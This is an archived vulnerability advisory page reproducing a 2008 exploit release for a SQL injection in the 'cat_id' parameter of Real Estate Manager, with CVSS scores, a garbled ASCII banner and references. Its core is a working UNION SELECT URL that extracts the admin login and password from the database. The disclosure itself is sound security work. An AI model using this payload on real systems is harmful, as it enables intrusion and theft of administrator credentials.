Real Estate Manager (cat_id) Remote SQL injection vulnerability

2008.10.23
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-4674
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ���� C r a C k E r ���� ���� T H E C R A C K O F E T E R N A L M I G H T ���� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ���������� From The Ashes and Dust Rises An Unimaginable crack.... ���������� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ���� [ Remote SQL Injection ] ���� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ : Author : CraCkEr : : : �� Group : N/A �� �� �� �� Script : Real Estate Manager �� �� Register Globals : �� �� Download : N/A �� �� �� �� Method : GET �� �� [��] ON [ ] OFF �� �� Critical : High [����������������] �� �� �� �� Impact : System access �� �� �� �� �������������������������������������������������������������������������������� ������������������������������������������������������������������������������ �� �� DALnet #crackers ���� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ : : �� Release Notes: �� �� �������������������������� �� �� Typically used for remotely exploitable vulnerabilities that can lead to �� �� system compromise. �� �� �� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ���� Exploit URL's ���� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ [SQL] http://localhost/path/?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM realestate_admin-- ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ���� © CraCkEr 2008 ���� ������������������������������������������������������������������������������������������������������������������������������������������������������������������������

References:

http://xforce.iss.net/xforce/xfdb/45499
http://www.securityfocus.com/bid/31443
http://www.milw0rm.com/exploits/6599
http://secunia.com/advisories/32049


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top